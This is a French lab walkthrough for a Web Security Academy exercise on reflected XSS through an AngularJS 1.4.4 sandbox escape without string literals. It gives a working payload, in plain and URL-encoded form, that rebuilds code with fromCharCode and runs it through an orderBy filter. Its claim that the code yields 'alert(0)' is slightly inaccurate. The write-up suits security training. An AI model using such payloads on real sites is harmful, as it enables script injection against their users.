Évasion du sandbox AngularJS sans chaînes

Reflected XSS with AngularJS sandbox escape without strings

Lab: Reflected XSS with AngularJS sandbox escape without strings | Web Security AcademyWebSecAcademy

Reflected XSS sur AngularJS 1.4.4 — échapper au sandbox et exécuter alert(1) sans $eval ni littéraux string.

Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security AcademyWebSecAcademy

Code observé

angular.module('labApp', []).controller('vulnCtrl',function($scope, $parse) {
                            $scope.query = {};
                            var key = 'search';
                            $scope.query[key] = 'test';
                            $scope.value = $parse(key)($scope.query);
                        });

Tentatives

Essai avec chaînes / $eval (n’a pas fonctionné) : {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
On peut casser le parsing en injectant via la query string avec & : &7+ 7 → &7%2b7

Construire dynamiquement alert(1) via toString().constructor.fromCharCode(...) et forcer l’évaluation par un filtre (orderBy) :

toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

Ce fragment casse le parse et, en hex/ASCII, produit la chaîne alert(0).

Payload (URL-encoded fourni)

%74%6f%53%74%72%69%6e%67%28%29%2e%63%6f%6e%73%74%72%75%63%74%6f%72%2e%70%72%6f%74%6f%74%79%70%65%2e%63%68%61%72%41%74%3d%5b%5d%2e%6a%6f%69%6e%3b%20%5b%31%2c%32%5d%7c%6f%72%64%65%72%42%79%3a%74%6f%53%74%72%69%6e%67%28%29%2e%63%6f%6e%73%74%72%75%63%74%6f%72%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%32%30%2c%36%31%2c%39%37%2c%31%30%38%2c%31%30%31%2c%31%31%34%2c%31%31%36%2c%34%30%2c%34%39%2c%34%31%29

Mis à jour il y a 2 mois

Ce contenu vous a-t-il été utile ?